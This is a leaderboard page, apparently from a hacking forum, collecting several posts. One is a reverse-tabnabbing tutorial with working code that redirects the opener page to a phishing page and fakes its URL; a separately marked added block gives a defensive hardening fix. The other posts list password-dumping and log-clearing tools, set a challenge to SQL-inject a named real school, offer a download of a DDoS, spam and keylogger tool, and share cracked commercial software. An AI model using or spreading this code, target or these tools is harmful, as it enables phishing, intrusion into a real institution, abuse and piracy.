
Leaderboard

Popular Content

Showing content with the highest reputation on 01/07/13 in all areas

  1. I hope I am not wrong in saying that we all know what a link is and what the target attribute of the <a> tag is used for. And given that most people consider the use of this very popular technique harmless, in this tutorial I will try to demonstrate the opposite. To begin with, I want to mention that what will be described here I personally consider to be a vulnerability in every browser except... ta-da! — Internet Explorer. That is why from here on I will use the word "vulnerability" when referring to this "phenomenon". Also, please note that this vulnerability will work perfectly only if the link is opened with a left click, and not with right click → "Open in new tab". And, last but not least, since everyone recommends using target="_blank" for all external links (we don't want the user to leave our page, after all), I have to observe that this vulnerability affects the majority of sites that link to external pages.

     Theory
     If we have the current page "A" and link to page "B" using the target="_blank" attribute, then when page "B" opens, a window.opener object is created for it, with whose help we can redirect page "A" to a new page while the user is browsing page "B". And most importantly, pages "A" and "B" can be on different domains.

     Practice
     To better understand what this is about, I recommend the following example: click here, wait for the page to load, then come back. If the error "window.opener is null" appears, then: you opened the link other than with a left click; your browser is not vulnerable; black magic? For a more complex example, please visit this page, where I used this vulnerability to simulate a phishing attack against a site offering email services. As with any similar site (Gmail, Hotmail etc.), every link received in a message has the target="_blank" attribute.

     Explanation
     To exploit the vulnerability, we send a message containing the URL of the "trap" page, where, to be sure the user opened the link with a left click and not some other way, we check that the window.opener object exists and is not NULL. After that, we can redirect the page the user came from. The code looks roughly like this:

         if (window.opener) {
             window.opener.location.replace('full-url-to-scam-page');
         }

     As you can see, it is all so simple, so trivial, so dangerous... If the phishing page and the legitimate one look like two peas in a pod and the domain name raises no suspicion, when the user returns to the original page they will certainly not notice the change. To raise even less suspicion, the URL of the phishing page can be altered as follows: from the funny.php page we need to pass along the URL (referrer) the user came from. I did it like this:

         var referrer = encodeURIComponent(document.referrer);
         window.opener.location = 'http://black.securrity.com/t_blank/scam.php#' + referrer;

     Then, on the scam.php page, I used the following code:

         // Extract the path from the URL fragment and strip the domain name
         var fakeurl = decodeURIComponent(window.location.hash).replace('#http://white.securrity.com', '');
         // Change the displayed URL without loading that page's content
         window.history.pushState(false, false, fakeurl);

     Instead of conclusions
     Honestly, I don't understand what the developers were thinking when they allowed location.replace() to be called, or the location object to be modified, across two different domains. If it were on the same domain, I would understand... And it really is very strange, because the other functions and attributes of the window.opener object cannot even be read, because:
    3 points
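The defensive side of the behaviour described in the post above, as an added example that is not part of the original post or the author's demo: a small JavaScript routine that audits an HTML fragment for target="_blank" anchors lacking rel="noopener", and rewrites them to carry rel="noopener noreferrer". noopener makes the browser open the new tab with window.opener === null, so the opened page cannot touch the opener's location; noreferrer additionally withholds the document.referrer that the post's scam.php used to forge the displayed URL. The sample HTML and all function names are constructed for this example.

```javascript
// Added example (not from the original post): auditing and hardening target="_blank" links.

// Parses the attribute text of one <a ...> tag into a lowercase-keyed map.
// Handles quoted and unquoted values; boolean attributes are ignored.
function parseAttrs(attrText) {
  const attrs = {};
  const re = /([a-zA-Z_:][-\w:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Returns the rel tokens with noopener and noreferrer added; existing tokens are kept.
function hardenedRel(rel) {
  const tokens = new Set((rel || '').toLowerCase().split(/\s+/).filter(Boolean));
  tokens.add('noopener');
  tokens.add('noreferrer');
  return [...tokens].join(' ');
}

// Lists the href of every target="_blank" anchor whose rel has neither noopener nor noreferrer.
function auditBlankLinks(html) {
  const unsafe = [];
  for (const m of html.matchAll(/<a\b([^>]*)>/gi)) {
    const attrs = parseAttrs(m[1]);
    if ((attrs.target || '').toLowerCase() !== '_blank') continue;
    const rel = (attrs.rel || '').toLowerCase().split(/\s+/);
    if (!rel.includes('noopener') && !rel.includes('noreferrer')) unsafe.push(attrs.href || '');
  }
  return unsafe;
}

// Rewrites every target="_blank" anchor so it carries rel="noopener noreferrer".
function hardenBlankLinks(html) {
  return html.replace(/<a\b([^>]*)>/gi, (tag, attrText) => {
    const attrs = parseAttrs(attrText);
    if ((attrs.target || '').toLowerCase() !== '_blank') return tag;
    // Drop any existing rel="..." so it is emitted exactly once, merged with the new tokens.
    const rest = attrText.replace(/\s+rel\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+)/gi, '');
    return `<a${rest} rel="${hardenedRel(attrs.rel)}">`;
  });
}

// Constructed sample: a message body as a webmail client might render it.
const SAMPLE_HTML = '<p>Hi! <a href="https://example.com/funny.php" target="_blank">click here</a> '
  + '<a href="/inbox">inbox</a> <a target=_blank rel="nofollow" href="https://example.org/">more</a></p>';
```

Run the audit over outgoing message HTML (or over templates in CI) and fail the build or sanitizer pass when the returned list is non-empty; the rewriting variant is the fix to apply in the HTML sanitizer of a site that renders user-supplied links.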
  2. Windows Tools For Penetration Testing
     Most penetration testers use either a Mac or a Linux-based platform to perform their penetration testing activities. However, it is always good practice to also have a Windows virtual machine with some tools ready to be used for the engagement. The reason for this is that although Windows cannot be used as a main platform for penetration testing, some of its utilities and tools can still help us extract information from our Windows targets. So in this post we will see some of the tools that we can use on our Windows system.
     HashCheck Shell Extension: The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files).
     Netcat: Netcat is often referred to as a "Swiss-army knife for TCP/IP". Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
     Metasploit Framework: The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
     RealVNC Viewer: Remote access software for desktop and mobile platforms.
     GetIf: SNMP tool that allows you to collect information about SNMP devices.
     Cain & Abel: Cain & Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
     Wireshark: Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development.
     PuTTY: PuTTY is an SSH and telnet client for the Windows platform.
     Pass The Hash Toolkit: The Pass-The-Hash Toolkit contains utilities to manipulate the Windows logon sessions maintained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with their corresponding NTLM credentials (e.g. users remotely logged in through Remote Desktop/Terminal Services), and also change at runtime the current username, domain name, and NTLM hashes.
     Cachedump: Recovering Windows password cache entries.
     Fport: Identify unknown open ports and their associated applications.
     Nbtscan: This is a command-line tool that scans for open NETBIOS name servers on a local or remote TCP/IP network, and this is a first step in finding open shares.
     Burp Suite: Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
     Winfo: Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed.
     ClearLogs: ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer.
     SQLDict: SQLdict is a dictionary attack tool for SQL Server.
     PMDump: PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process.
     GrabItAll: GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attacker's computer, or redirect traffic between two other computers through the attacker's computer. In the last case you need to enable IP forwarding, which can be done with GrabItAll too.
     DumpUsers: DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1.
     BrowseList: BrowseList retrieves the browse list. The output list contains computer names and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading).
     Remoxec: Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation).
     WMICracker: Brute-force tool for Windows Management Instrumentation (WMI).
     Venom: Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled.
     SMBAT: The SMB Auditing Tool is a password auditing tool for the Windows and SMB platforms. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremely fast to guess passwords on these platforms.
     RPCScan: RPCScan v2.03 is a Windows-based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins.
     LSASecretsDump: LSASecretsDump is a small console application that extracts the LSA secrets from the Registry, decrypts them, and dumps them into the console window.
     SQLPing: SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever.
     OAT: The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.
     Pwdump7: Extract password hashes from local user accounts.
     PsTools: The PsTools package provides a set of command line utilities that allow you to manage local and remote systems.
     Incognito: Incognito is a tool for manipulating Windows access tokens and is intended for use by penetration testers, security consultants and system administrators.
     DumpSec: DumpSec is a security auditing program for Microsoft Windows NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information.
     X-Deep32: X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, Linux, IBM AIX etc.
     LC5: Windows password cracker.
     Ophcrack: Ophcrack is a free Windows password cracker based on rainbow tables.
     SiVuS: SiVuS is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations.
     Source: Windows Tools For Penetration Testing
    1 point
  3. Target: SURYA SCHOOL OF ENGINEERING AND TECHNOLOGY. Method: union based. Proof: post a picture with the version and your name. PM me the syntax. Solvers: afumat, Praetorian, ajkaro, Boogy, fallen_angel, pedala1, sweby
    1 point
  4. Always copied, never equalled. May the enemies die, not Nytro?
    1 point
  5. One more addition that applies from now on. Try not to post in a topic if it has meanwhile been moved to the trash or its creator has been banned. Of course there are exceptions too.
    -1 points
  6. Addition to rule 4, which is frequently broken. A minimum of 10 QUALITY posts, because otherwise anyone can fill the forum with "hi" and Fun Stuff so they can leech/get help as quickly as possible.
    -1 points
  7. This topic has turned into a chat, from what I can see. I keep following every post and giving my opinion on how impertinent some people here are. Instead of saying thank you and being a team, you (actually, some of you) post nonsense comments. There is a chat for arguing and criticising each other. Salpa
    -1 points
  8. Red theme: Blue theme: Program options:
     IP Port Scanner; Web IP Finder; IP Resolver Locator. DDoS
     Email Sender; Bomb; HackIP; Yahoo! Spammer
     Hashing: MD5, SHA1, SHA512; MD5 Cracker; Binary (String to Binary and Binary to String).
     My System: System Information; Local Keylogger; Kill Process; Task Manager (Enable/Disable).
     Other Tools: Text To Speech; Avatar Grabber; Shutdown, Restart; Hackyard Browser.
     Virus scan: Download Link: Download Hackyard.Multi.Tool.rar @ UppIT Pass: praetorian@hackyard.net
    -1 points
  9. Software name: IntelliLock
     Version: 1.7.0.0
     Release Type: Full Version
     Last Updated: 4 January 2013 - 4:36 PM
     OS: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8 (x86/x64)
     Developer: Eziriz
     Web-site: http://www.eziriz.com/
     Cracked.by.yoza[upK]
     WHAT'S NEW:
     - [+] Added Visual Studio 2012 Add-in including example projects
     - [+] Added Anti-Clock freezing protection technique
     - [+] Full .NET 4.5 Support
     - [+] Full Windows Phone 8 protection support
     - [!] Fixed IL Code Encryption issue on Windows 8
     - [!] Fixed digital signing issue on Windows 8
     - [!] Fixed Inject Invalid Metadata issue on x64 systems
     - [!] Fixed strong name signing issue on x64 assemblies
     - [!] Fixed debug database file (.pdb) issue
     - [!] Fixed Silverlight 5 problem automatically loading referenced dependencies
     https://www.box.com/s/n0oy4zhzr6wopkt95e87
    -1 points